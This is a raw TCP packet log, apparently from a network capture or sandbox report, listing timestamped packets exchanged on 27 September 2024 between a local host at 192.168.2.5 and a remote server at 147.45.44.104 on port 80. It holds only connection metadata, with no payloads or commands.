Sep 27, 2024 00:15:10.220813036 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.220832109 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.220889091 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.304860115 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.304877043 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.304889917 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.304908991 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.304920912 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.304934025 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.304965973 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.305016041 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.305433989 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.305453062 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.305490971 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.305512905 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.305525064 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.305537939 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.305578947 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.305578947 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.305578947 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.305598974 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.306237936 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.306248903 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.306260109 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.306305885 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.306317091 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.306339025 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.306339979 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.306359053 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.306359053 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.307106972 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.307118893 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.307132959 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.307176113 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.307190895 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.307204962 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.307210922 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.307228088 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.307285070 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.307862043 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.307949066 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.394684076 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.394699097 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.394709110 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.394797087 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.394861937 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.394908905 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.394927025 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.394973993 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.395071983 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.395082951 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.395093918 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.395128965 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.395145893 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.395184994 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.395184994 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.395196915 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.395209074 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.395237923 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.395268917 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.396027088 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.396039009 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.396049976 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.396095991 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.396141052 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.396512985 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.396522999 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.396534920 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.396574974 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.396590948 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.396590948 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.396601915 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.396610975 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.396620035 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.396668911 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.396668911 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.397363901 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.397375107 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.397386074 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.397420883 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.397442102 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.397453070 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.397464991 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.397475958 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.397504091 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.397538900 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.398308992 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.398319960 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.398330927 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.398371935 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.398433924 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.398462057 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.398473024 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.398485899 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.398523092 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.398536921 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.399183035 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.399307966 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.399322033 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.399403095 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.760737896 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.760754108 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.760765076 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.760783911 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.760796070 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.760808945 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.760821104 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.760893106 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.760910988 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.760922909 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.760961056 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.760961056 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.760976076 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.761004925 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.761017084 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.761029959 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.761042118 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.761053085 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.761065006 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.761075020 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.761075020 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.761075020 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.761092901 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.761106014 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.761125088 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.761125088 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.761202097 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.761316061 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.761327028 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.761342049 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.761352062 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.761369944 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.761377096 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.761387110 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.761394024 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.761404037 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.761415005 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.761425018 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.761444092 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.761451960 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.761451960 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.761451960 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.761466026 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.761477947 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.761493921 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.761504889 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.761504889 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.761516094 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.761528969 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.761540890 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.761553049 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.761574030 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.761574030 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.761574030 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.761584997 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.762933016 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.762944937 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.762955904 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.762968063 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.762979031 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.762991905 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.763008118 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.763026953 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.763072968 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.763092041 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.763103008 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.763114929 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.763127089 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.763132095 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.763143063 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.763163090 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.763163090 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.763171911 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.763183117 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.763194084 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.763206959 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.763220072 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.763226032 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.763226032 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.763243914 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.763254881 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.763264894 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.763264894 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.763278008 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.763289928 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.763300896 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.763350010 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.763370037 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.763370037 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.763401985 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.763469934 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.763550997 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.767631054 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.767642021 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.767654896 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.767781019 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.767781019 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.767920971 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.767932892 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.767967939 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.768007994 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.768055916 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.768068075 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.768079042 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.768090963 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.768102884 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.768115044 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.768129110 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.768129110 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.768129110 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.768145084 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.768165112 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.768198967 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.768198967 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.768208027 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.768845081 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.768882990 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.768894911 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.768914938 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.768923998 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.768923998 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.768935919 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.768943071 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.768954992 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.768966913 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.768980980 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.768980980 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.768990040 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.769004107 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.769004107 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.769036055 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.769803047 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.769814968 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.769825935 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.769857883 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.769857883 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.769886971 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.769898891 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.769910097 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.769921064 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.769934893 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.769967079 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.770009995 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.770023108 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.770092964 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.770901918 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.770914078 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.770924091 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.770947933 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.770958900 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.770958900 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.770975113 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.770986080 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.770998955 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.771006107 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.771018028 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.771030903 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.771030903 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.771056890 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.771684885 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.771697044 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.771708965 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.771748066 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.771759987 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.771773100 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.771786928 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.771786928 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.771794081 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.771807909 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.771869898 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.771869898 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.772666931 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.772679090 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.772691965 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.772730112 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.772730112 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.772743940 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.772778988 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.772789955 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.772802114 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.772814989 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.772823095 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.772824049 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.772887945 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.773575068 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.773591995 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.773605108 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.773660898 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.773660898 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.773729086 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.773740053 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.773751020 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.773762941 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.773771048 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.773781061 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.773793936 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.773833036 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.774573088 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.774583101 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.774595022 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.774626970 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.774636030 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.774636030 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.774647951 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.774658918 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.774676085 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.774682999 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.774682999 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.774699926 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.774770021 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.774770021 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.774770021 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.775423050 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.775466919 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.775734901 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.775747061 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.775758982 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.775769949 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.775784969 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.775784969 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.775794983 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.775806904 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.775825977 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.775866032 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.775866032 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.776269913 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.776312113 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.776473045 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.776484966 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.776523113 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.776523113 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.776637077 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.776654005 CEST	80	49709	147.45.44.104	192.168.2.5
